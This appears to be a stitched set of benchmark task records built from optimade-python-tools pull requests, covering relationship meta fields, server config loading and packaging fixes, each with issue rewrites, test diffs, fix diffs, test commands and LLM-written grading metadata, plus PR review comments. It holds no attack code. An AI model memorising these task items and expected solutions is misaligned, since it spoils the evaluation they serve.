Add meta.description to BaseRelationshipResource Sub-classed BaseResource to introduce special OPTiMaDe requirement of having an OPTIONAL `meta` field in the relationship resource, which MUST have the field `description`, it it's present. Also, introduced some pylint disables for the models to avoid pylint complaining about long lines and wrong use of `self` for validators (which are class methods, hence they should NOT have the `self` argument).
**Title** Add optional `meta.description` support to relationship resources **Problem** OPTiMaDe relationship objects must be able to include an optional `meta` object that contains a `description` field. The existing models and OpenAPI schema did not provide this field, leading to non‑compliant responses. **Root Cause** The generic base resource used for relationships lacked a dedicated meta definition, and the OpenAPI specifications still referenced the generic resource schema. **Fix / Expected Behavior** - Introduce a dedicated meta schema for relationships with a required `description` property. - Extend the base relationship resource model to expose an optional `meta` field of the new schema type. - Update the relationship model to use the extended resource type for its `data` field. - Revise the OpenAPI definitions to reference the new relationship resource and meta schemas. - Add pylint disables for validator signatures that intentionally omit `self`. **Risk & Validation** - Verify that existing endpoints continue to return valid JSON API responses when the `meta` field is omitted. - Confirm that responses including the optional `meta.description` pass schema validation against the updated OpenAPI spec. - Run the full test suite and linting to ensure no new warnings or errors are introduced.
131
Materials-Consortia/optimade-python-tools
diff --git a/tests/models/test_models.py b/tests/models/test_models.py index 072141d3..3c4e7ac0 100644 --- a/tests/models/test_models.py +++ b/tests/models/test_models.py @@ -59,18 +59,45 @@ class TestPydanticValidation(unittest.TestCase): StructureResource(**StructureMapper.map_back(structure)) def test_simple_relationships(self): + """Make sure relationship resources are added to the correct relationship""" + + good_relationships = ( + {"references": {"data": [{"id": "dijkstra1968", "type": "references"}]}}, + {"structures": {"data": [{"id": "dijkstra1968", "type": "structures"}]}}, + ) + for relationship in good_relationships: + EntryRelationships(**relationship) + + bad_relationships = ( + {"references": {"data": [{"id": "dijkstra1968", "type": "structures"}]}}, + {"structures": {"data": [{"id": "dijkstra1968", "type": "references"}]}}, + ) + for relationship in bad_relationships: + with self.assertRaises(ValidationError): + EntryRelationships(**relationship) + + def test_advanced_relationships(self): + """Make sure the rules for the base resource 'meta' field are upheld""" + relationship = { - "references": {"data": [{"id": "dijkstra1968", "type": "references"}]} + "references": { + "data": [ + { + "id": "dijkstra1968", + "type": "references", + "meta": { + "description": "Reference for the search algorithm Dijkstra." + }, + } + ] + } } EntryRelationships(**relationship) relationship = { - "references": {"data": [{"id": "dijkstra1968", "type": "structures"}]} - } - with self.assertRaises(ValidationError): - EntryRelationships(**relationship) - relationship = { - "references": {"data": [{"id": "dijkstra1968", "type": "structures"}]} + "references": { + "data": [{"id": "dijkstra1968", "type": "references", "meta": {}}] + } } with self.assertRaises(ValidationError): EntryRelationships(**relationship)
[ "tests/models/test_models.py::TestPydanticValidation::test_advanced_relationships" ]
[ "tests/models/test_models.py::TestPydanticValidation::test_bad_references", "tests/models/test_models.py::TestPydanticValidation::test_bad_structures", "tests/models/test_models.py::TestPydanticValidation::test_good_references", "tests/models/test_models.py::TestPydanticValidation::test_good_structures", "tests/models/test_models.py::TestPydanticValidation::test_more_good_structures", "tests/models/test_models.py::TestPydanticValidation::test_simple_relationships", "tests/models/test_models.py::test_constrained_list" ]
Class: BaseRealationshipMeta(description: str) Location: optimade/models/optimade_json.py Inputs: <description: str – required, human‑readable description of the relationship> Outputs: <BaseRealationshipMeta instance; ValidationError if description missing or not a string> Description: Model for the optional “meta” object attached to a relationship resource; the field *description* must be present when the meta object is supplied. Class: BaseRelationshipResource(id: str, type: str, meta: Optional[BaseRealationshipMeta] = None) Location: optimade/models/optimade_json.py Inputs: <id: str – resource identifier; type: str – resource type; meta: optional BaseRealationshipMeta instance (must contain description if provided)> Outputs: <BaseRelationshipResource instance; ValidationError if id or type missing/invalid, or if meta is supplied without a description> Description: Extends the generic JSON:API resource model for relationship resources, adding an optional *meta* field that must contain a *description* when present. Class: Relationship(data: Optional[Union[BaseRelationshipResource, List[BaseRelationshipResource]]] = None, …) Location: optimade/models/optimade_json.py Inputs: <data: either a single BaseRelationshipResource, a list of them, or None; other standard JSON:API relationship fields (links, meta, etc.)> Outputs: <Relationship instance; ValidationError if *data* contains resources of the wrong type or if any contained BaseRelationshipResource’s meta is malformed> Description: JSON:API relationship model extended for OPTiMaDe; the *data* linkage can reference relationship resources that may include the optional *meta* object with required description.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/models/test_models.py" }
{ "num_modified_files": 9, "num_modified_lines": 113, "pr_author": "CasperWA", "pr_labels": [ "schema: Concerns the OpenAPI schema" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding an optional `meta` field to relationship resources, where the meta must contain a `description` if present. The provided test patch adds checks that a valid description passes validation and that missing or empty description triggers a ValidationError, directly reflecting the requirement. The tests align with the stated behavior and no hidden expectations, external URLs, or naming constraints are present, indicating a clear, solvable task.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, 
"test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
69d215c1b5c9e956b150c3b010d4e1ba8bba905d
2020-01-16 11:03:40
materials-consortia__optimade-python-tools-137
diff --git a/optimade/server/config.py b/optimade/server/config.py index de1a38aa..ac75fcaa 100644 --- a/optimade/server/config.py +++ b/optimade/server/config.py @@ -146,7 +146,7 @@ class ServerConfig(Config): self.implementation = {} for field in Implementation.schema()["properties"]: value_config = config.get("IMPLEMENTATION", field, fallback=None) - value_default = self._DEFAULTS(f"implementation")[field] + value_default = self._DEFAULTS("implementation")[field] if value_config is not None: self.implementation[field] = value_config elif value_default is not None: @@ -191,18 +191,18 @@ class ServerConfig(Config): setattr( self, f"{endpoint}_collection", - config.get(f"{endpoint}_collection"), - getattr(self._DEFAULTS(f"{endpoint}_collection")), + config.get( + f"{endpoint}_collection", self._DEFAULTS(f"{endpoint}_collection") + ), ) self.page_limit = int(config.get("page_limit", self._DEFAULTS("page_limit"))) - self.version = config.get("api_version", self._DEFAULTS("api_version")) self.default_db = config.get("default_db", self._DEFAULTS("default_db")) # This is done in this way, since each field is OPTIONAL self.implementation = config.get("implementation", {}) for field in Implementation.schema()["properties"]: - value_default = self._DEFAULTS(f"implementation.{field}") + value_default = self._DEFAULTS("implementation")[field] if field in self.implementation: # Keep the config value pass @@ -210,9 +210,11 @@ class ServerConfig(Config): self.implementation[field] = value_default self.provider = config.get("provider", self._DEFAULTS("provider")) - self.provider_fields = set( - config.get("provider_fields", self._DEFAULTS("provider_fields")) - ) + self.provider_fields = {} + for endpoint in {"structures", "references"}: + self.provider_fields[endpoint] = set( + config.get("provider_fields", {}).get(endpoint, []) + ) CONFIG = ServerConfig()
Fix `load_from_json` This function did not work properly. Add test file for config.py, for now only with a simple test to run `load_from_json()`. Feel free to add more tests to `test_config.py` either in this PR or later.
**Title** Correct defaults handling and provider‑field mapping in server configuration loading **Problem** The configuration loader failed to apply default values for implementation settings, collection parameters, and provider fields, causing missing or incorrect configuration state when `load_from_json()` is used. **Root Cause** Defaults were accessed with malformed keys and provider fields were treated as a single flat set rather than per‑endpoint mappings. **Fix / Expected Behavior** - Retrieve implementation defaults using the correct identifier. - Populate each collection attribute with its specific fallback default when not explicitly set. - Apply scalar defaults (e.g., API version, page limit) correctly during loading. - Store provider fields as a dictionary keyed by endpoint, each containing a set of field names. - Ensure `load_from_json()` returns a fully populated configuration object that respects both supplied values and defaults. **Risk & Validation** - Confirm existing configuration files load unchanged and produce expected defaults. - Add tests covering partial and full configuration scenarios for `load_from_json()`. - Run the complete test suite to detect any regressions elsewhere.
137
Materials-Consortia/optimade-python-tools
diff --git a/tests/server/config_test.ini b/tests/server/config_test.ini new file mode 100644 index 00000000..17ece366 --- /dev/null +++ b/tests/server/config_test.ini @@ -0,0 +1,25 @@ +[BACKEND] +USE_REAL_MONGO = no +MONGO_DATABASE = optimade +LINKS_COLLECTION = links +REFERENCES_COLLECTION = references +STRUCTURES_COLLECTION = structures + +[SERVER] +PAGE_LIMIT = 500 +DEFAULT_DB = test_server + +[IMPLEMENTATION] +name = Example implementation +source_url = https://github.com/Materials-Consortia/optimade-python-tools + +[PROVIDER] +prefix = _exmpl_ +name = Example provider +description = Provider used for examples, not to be assigned to a real database +homepage = http://example.com +index_base_url = http://localhost:5001/index/optimade + +[structures] +band_gap : +_mp_chemsys : diff --git a/tests/server/config_test.json b/tests/server/config_test.json new file mode 100644 index 00000000..a1ab885c --- /dev/null +++ b/tests/server/config_test.json @@ -0,0 +1,26 @@ +{ + "use_real_mongo": false, + "mongo_database": "optimade", + "links_collection": "links", + "references_collection": "references", + "structures_collection": "structures", + "page_limit": 500, + "default_db": "test_server", + "implementation": { + "name": "Example implementation", + "source_url": "https://github.com/Materials-Consortia/optimade-python-tools" + }, + "provider": { + "prefix": "_exmpl_", + "name": "Example provider", + "description": "Provider used for examples, not to be assigned to a real database", + "homepage": "http://example.com", + "index_base_url": "http://localhost:5001/index/optimade" + }, + "provider_fields": { + "structures": [ + "band_gap", + "_mp_chemsys" + ] + } +} diff --git a/tests/server/server_test_ini.cfg b/tests/server/server_test_ini.cfg new file mode 100644 index 00000000..b487c807 --- /dev/null +++ b/tests/server/server_test_ini.cfg @@ -0,0 +1,3 @@ +[optimadeconfig] +CONFIG = ./config_test.ini +# INDEX_LINKS = ./index_links.json diff --git 
a/tests/server/server_test_json.cfg b/tests/server/server_test_json.cfg new file mode 100644 index 00000000..3e77e7a5 --- /dev/null +++ b/tests/server/server_test_json.cfg @@ -0,0 +1,3 @@ +[optimadeconfig] +CONFIG = ./config_test.json +# INDEX_LINKS = ./index_links.json diff --git a/tests/server/test_config.py b/tests/server/test_config.py new file mode 100644 index 00000000..3efc30a1 --- /dev/null +++ b/tests/server/test_config.py @@ -0,0 +1,40 @@ +# pylint: disable=import-outside-toplevel,protected-access,pointless-statement +import unittest + +from pathlib import Path + + +class LoadFromIniTest(unittest.TestCase): + """Test server.config.ServerConfig.load_from_ini""" + + def test_config_ini(self): + """Invoke CONFIG using config_test.ini""" + from optimade.server.config import ServerConfig + + CONFIG = ServerConfig( + server_cfg=Path(__file__).parent.joinpath("server_test_ini.cfg").resolve() + ) + + CONFIG.default_db # Initiate CONFIG, running load_from_json() + # _path should now be updated with the correct path to the config json file: + self.assertEqual( + CONFIG._path, Path(__file__).parent.joinpath("config_test.ini").resolve() + ) + + +class LoadFromJsonTest(unittest.TestCase): + """Test server.config.ServerConfig.load_from_json""" + + def test_config_json(self): + """Invoke CONFIG using config_test.json""" + from optimade.server.config import ServerConfig + + CONFIG = ServerConfig( + server_cfg=Path(__file__).parent.joinpath("server_test_json.cfg").resolve() + ) + + CONFIG.default_db # Initiate CONFIG, running load_from_json() + # _path should now be updated with the correct path to the config json file: + self.assertEqual( + CONFIG._path, Path(__file__).parent.joinpath("config_test.json").resolve() + )
[ "tests/server/test_config.py::LoadFromJsonTest::test_config_json" ]
[ "tests/server/test_config.py::LoadFromIniTest::test_config_ini" ]
Method: ServerConfig.__init__(self, server_cfg: pathlib.Path) Location: optimade/server/config.py – class `ServerConfig` constructor Inputs: `server_cfg` – a `Path` object pointing to a server configuration file (INI or JSON) that contains an `[optimadeconfig]` section with a `CONFIG` entry referencing the actual Optimade configuration file. Outputs: Returns a new `ServerConfig` instance. The instance initially holds the path to the server‑config file; the real configuration file path is stored in the private attribute `_path` after the first lazy load (triggered by accessing any configuration attribute such as `default_db`). Description: Instantiates a server‑side configuration object that resolves the provided server‑config file, determines the underlying Optimade configuration file (INI or JSON), and prepares lazy loading of configuration values. Function: ServerConfig.default_db (property) Location: optimade/server/config.py – lazily‑loaded attribute of `ServerConfig` Inputs: None (accessed as an attribute) Outputs: Returns the configured default database name as a string; accessing this property also triggers loading of the full configuration and updates the internal `_path` to the resolved config file path. Description: Provides the default database name defined in the Optimade configuration; accessing it forces the configuration to be parsed (including a call to `load_from_json` when appropriate).
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/server/test_config.py" }
{ "num_modified_files": 1, "num_modified_lines": 10, "pr_author": "CasperWA", "pr_labels": [ "bug: Something isn't working" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue asks to fix `ServerConfig.load_from_json` so that after initialization the internal `_path` points to the correct config file, as verified by the new tests. The tests clearly assert this behavior and no other hidden requirements are introduced. There are no signs of test coupling, missing names, external dependencies, unrelated patch artifacts, or hidden domain knowledge, so the task is a straightforward bug fix (SOLVABLE).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, 
"test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
5a5e9039997e7095661cb2b24bcff2ed5ba44a34
2020-03-12 15:50:53
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/225?src=pr&el=h1) Report > Merging [#225](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/225?src=pr&el=desc) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/5a5e9039997e7095661cb2b24bcff2ed5ba44a34&el=desc) will **not change** coverage by `%`. > The diff coverage is `n/a`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/225/graphs/tree.svg?width=650&height=150&src=pr&token=UJAtmqkZZO)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/225?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #225 +/- ## ======================================= Coverage 87.55% 87.55% ======================================= Files 43 43 Lines 1912 1912 ======================================= Hits 1674 1674 Misses 238 238 ``` | Flag | Coverage Δ | | |---|---|---| | #unittests | `87.55% <ø> (ø)` | | ------ [Continue to review full report at Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/225?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/225?src=pr&el=footer). Last update [5a5e903...260f2fe](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/225?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). CasperWA: > Thanks for catching this, assume this is no problem for #214. It seems he will [start over](https://github.com/Materials-Consortia/optimade-python-tools/pull/224#issuecomment-598340949) 😮
materials-consortia__optimade-python-tools-225
diff --git a/MANIFEST.in b/MANIFEST.in index 4a047b4d..ad0839c8 100644 --- a/MANIFEST.in +++ b/MANIFEST.in @@ -1,3 +1,4 @@ recursive-include optimade/server/ *.ini *.json recursive-include optimade/server/data/ * recursive-include optimade/grammar/ *.lark +recursive-include optimade/validator/data/ *.txt
Add txt-files in optimade.validator.data to MANIFEST Also added to `test_setup.py` test. I found this error, since I couldn't install the latest commit when testing Materials-Consortia/optimade-validator-action#4
**Title** Include validator text resources in the source distribution **Problem** The package's source distribution omitted the plain‑text files used by the validator component, causing installation failures and test errors when those resources are accessed. **Root Cause** The manifest configuration did not list the validator’s `.txt` data files, so they were excluded from built wheels and source releases. **Fix / Expected Behavior** - Extend the manifest to package the validator’s text files. - Ensure the validator can locate and read its data files after installation. - Allow the project’s packaging test suite to succeed. - Preserve existing package contents and structure. **Risk & Validation** - Verify that only the intended `.txt` resources are added, avoiding accidental inclusion of extraneous files. - Run the full test suite, including the packaging test, to confirm successful installation and validator functionality. - Perform a clean build/install cycle to ensure the distributed package contains the new resources.
225
Materials-Consortia/optimade-python-tools
diff --git a/tests/test_setup.py b/tests/test_setup.py index ff972b7a..408df991 100644 --- a/tests/test_setup.py +++ b/tests/test_setup.py @@ -35,6 +35,8 @@ class TestSetup(unittest.TestCase): r"test_structures\.json": False, r"test_references\.json": False, r"test_links\.json": False, + r"filters\.txt": False, + r"optional_filters\.txt": False, } count = 0 for line in lines:
[ "tests/test_setup.py::TestSetup::test_distributions_package" ]
[]
No new interfaces are introduced.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/test_setup.py" }
{ "num_modified_files": 1, "num_modified_lines": 1, "pr_author": "CasperWA", "pr_labels": [ "bug: Something isn't working", "priority/high: Issue or PR with a consensus of high priority", "tests: Related to tests" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "dev_ops_enh", "minor_bug" ], "reason": null, "reasoning": "The issue requests that the .txt files in optimade.validator.data be included in the package distribution by updating MANIFEST.in, and the test was updated to check for those files. The test expectations directly match the requested change, with no hidden requirements or unrelated test behavior. There are no ambiguous specifications, external references, or implicit naming problems. 
Therefore the task is clearly defined and solvable (code A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
ed508390a18b67a040c629b284b83f48327d60aa
2020-03-28 17:31:49
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241?src=pr&el=h1) Report > Merging [#241](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241?src=pr&el=desc) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/7768f62f2530c8310ae77fe92556a91f2dfe91af&el=desc) will **decrease** coverage by `12.70%`. > The diff coverage is `0.00%`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241/graphs/tree.svg?width=650&height=150&src=pr&token=UJAtmqkZZO)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #241 +/- ## =========================================== - Coverage 87.11% 74.40% -12.71% =========================================== Files 43 51 +8 Lines 1862 2180 +318 =========================================== Hits 1622 1622 - Misses 240 558 +318 ``` | Flag | Coverage Δ | | |---|---|---| | #unittests | `74.40% <0.00%> (-12.71%)` | :arrow_down: | | [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [optimade/adapters/\_\_init\_\_.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241/diff?src=pr&el=tree#diff-b3B0aW1hZGUvYWRhcHRlcnMvX19pbml0X18ucHk=) | `0.00% <0.00%> (ø)` | | | [optimade/adapters/structures/\_\_init\_\_.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241/diff?src=pr&el=tree#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy9fX2luaXRfXy5weQ==) | `0.00% <0.00%> (ø)` | | | [optimade/adapters/structures/aiida.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241/diff?src=pr&el=tree#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy9haWlkYS5weQ==) | `0.00% <0.00%> (ø)` | | | 
[optimade/adapters/structures/ase.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241/diff?src=pr&el=tree#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy9hc2UucHk=) | `0.00% <0.00%> (ø)` | | | [optimade/adapters/structures/cif.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241/diff?src=pr&el=tree#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy9jaWYucHk=) | `0.00% <0.00%> (ø)` | | | [optimade/adapters/structures/proteindatabank.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241/diff?src=pr&el=tree#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy9wcm90ZWluZGF0YWJhbmsucHk=) | `0.00% <0.00%> (ø)` | | | [optimade/adapters/structures/pymatgen.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241/diff?src=pr&el=tree#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy9weW1hdGdlbi5weQ==) | `0.00% <0.00%> (ø)` | | | [optimade/adapters/structures/utils.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241/diff?src=pr&el=tree#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy91dGlscy5weQ==) | `0.00% <0.00%> (ø)` | | | ... and [6 more](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241/diff?src=pr&el=tree-more) | | ------ [Continue to review full report at Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241?src=pr&el=footer). Last update [7768f62...e99a8b9](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). shyamd: I'm not fully seeing what this does. How does this plug into the server for instance? 
CasperWA: > I'm not fully seeing what this does. How does this plug into the server for instance? It's not for server use, more for client use. The main goal is to interpret OPTIMADE structures and retrieve their information/convert them to client-usable data formats and constructs. CasperWA: > thanks @CasperWA , I think having these converters in the optimade python tools is very useful. Thanks :) Me too, hence the "fold back" from the client I'm working on. > May I suggest to add both individual extras for the corresponding dependencies + a `converters` extra that contains them all? I thought about this, got tired at the idea, and set it aside for a time when I have not more exciting ideas for how the adapter should work. I.e., I will definitely add this to the `setup.py` 👍 ml-evs: Not going to review this until everyone else has finished hacking at it (ping me @CasperWA), but think this looks very useful and is definitely in the spirit of "optimade-python-tools". Once we get this in, I think we should focus for a while on writing docs that showcase how this repo can be used by implementers of servers and clients. Would we even want to provide a simple Python/CLI client implementation in this repo, given that we have most of the tools already? (I guess this would depend on how much this treads on the toes of your fancier client @CasperWA) CasperWA: @ml-evs @ltalirz I consider this ready for review now. I have added a lot of tests, and tried to come up with edge-cases, and what to do for various optional properties. This has hopefully resulted in more robust conversion functions. Some of the conversion function tests are the same from test file to test file. This may be made more elegant, but in order to properly separate out the test functions if one should not have the specific dependency installed, this is the design I chose. Note also, the kind of ugly addition to our CI workflows, due to AiiDA. 
In order to create a `StructureData` AiiDA Node, one _must_ have a functioning AiiDA profile loaded, hence all the extra stuff. I have opened an issue aiidateam/aiida-core#3898 to try and make this more gentle on the lines of code in our workflows. Since this design idea from the side of AiiDA is so deeply integrated into its code base, it is difficult to see how we can get to a state, where it may not be needed to set up an AiiDA profile, just for testing this. Finally, if you have any optimizations for the various converters, now is the time! :) If you want to add a bunch of new ones (especially to the `references` adapter), perhaps consider either doing it in another PR or _quickly_ add it to this PR :) I know the PDBx/mmCIF is a bit of a mess, but I don't have the time now to research a whole new and to me unknown format to get it properly up to speed - sorry. I feel this is better than nothing for now? CasperWA: > Not going to review this until everyone else has finished hacking at it (ping me @CasperWA), but think this looks very useful and is definitely in the spirit of "optimade-python-tools". Consider yourself "pinged" @ml-evs :) (But not until Tuesday the 14th and onwards). > Once we get this in, I think we should focus for a while on writing docs that showcase how this repo can be used by implementers of servers and clients. (...) I think that would definitely be the next big "project" for the repo. Also, we should make sure to update to v1.0.0 ASAP (both the package version, but I was thinking mainly of the OPTIMADE API version). Maybe v1 of the package should indeed wait until we have docs in place. > (...) Would we even want to provide a simple Python/CLI client implementation in this repo, given that we have most of the tools already? (I guess this would depend on how much this treads on the toes of your fancier client @CasperWA) So as soon as this PR goes through, we could (in theory) adopt my client. 
That way I can update the current version with _this_ adapter. And I don't know how fancy it is... But you can now [check it out on binder](https://mybinder.org/v2/gh/aiidalab/aiidalab-optimade/pure_jupyter_version?urlpath=%2Fapps%2FOPTIMADE_general.ipynb) to judge for yourself 😅 I could even move the repository [aiidalab/aiidalab-optimade](https://github.com/aiidalab/aiidalab-optimade) over to Materials-Consortia? I have discussed this loosely with @giovannipizzi already. I would still want to create an AiiDA lab-specific edition of the client, but the most recent version, which is about to be merged into the `develop` branch, is completely AiiDA- and AiiDA lab-agnostic - only depending on the Jupyter environment, really. But I don't know if we want an OPTIMADE client in Jupyter under the Materials-Consortia umbrella? In any case! We should probably create an issue for this discussion, or rather pick it up at a consortium meeting. shyamd: I would say we want to make a stark distinction between a client and a jupyter-widget. The client should be agnostic of use, so generally just a python class that can be instantiated with an OPTIMADE endpoint URL that allows traversal and retrieval. I would argue this `adapters` PR is really a part of the client and not core. We might think about breaking this into 3 namespace-packages. One for core models and definitions. One for the server. One for the client. ml-evs: > Consider yourself "pinged" @ml-evs :) (But not until Tuesday the 14th and onwards). :+1: > I think that would definitely be the next big "project" for the repo. Also, we should make sure to update to v1.0.0 ASAP (both the package version, but I was thinking mainly of the OPTIMADE API version). Maybe v1 of the package should indeed wait until we have docs in place. :+1: > So as soon as this PR goes through, we could (in theory) adopt my client. That way I can update the current version with _this_ adapter. And I don't know how fancy it is... 
But you can now [check it out on binder](https://mybinder.org/v2/gh/aiidalab/aiidalab-optimade/pure_jupyter_version?urlpath=%2Fapps%2FOPTIMADE_general.ipynb) to judge for yourself sweat_smile This is very impressive, I love it! Definitely going to have a look through the code, I didn't realise ipywidgets could be so powerful. This goes far above and beyond what I had in mind for this repository, but perhaps there is potential for some overlap? I was imagining some simple client classes that allow you to get the pydantic models from a server in pure Python (trivial given that we do this already) and perhaps a small CLI on top of that. This could obviously be achieved with `wget`... perhaps we could think of a simple OPTIMADE use case that could be achieved more easily with this approach, e.g. use the CLI to find all structures of a given formula across all of the providers and stick them in a json file, with an easy way to read it back in with the pydantic models. > In any case! We should probably create an issue for this discussion, or rather pick it up at a consortium meeting. :+1: ml-evs: > I would say we want to make a stark distinction between a client and a jupyter-widget. The client should be agnostic of use, so generally just a python class that can be instantiated with an OPTIMADE endpoint URL that allows traversal and retrieval. I would argue this `adapters` PR is really a part of the client and not core. We might think about breaking this into 3 namespace-packages. One for core models and definitions. One for the server. One for the client. I think we're in agreement, though I'm not against bundling the models/definitions with our example server and a lightweight example client in one package (for now, at least) but we should discuss this at the next meeting. 
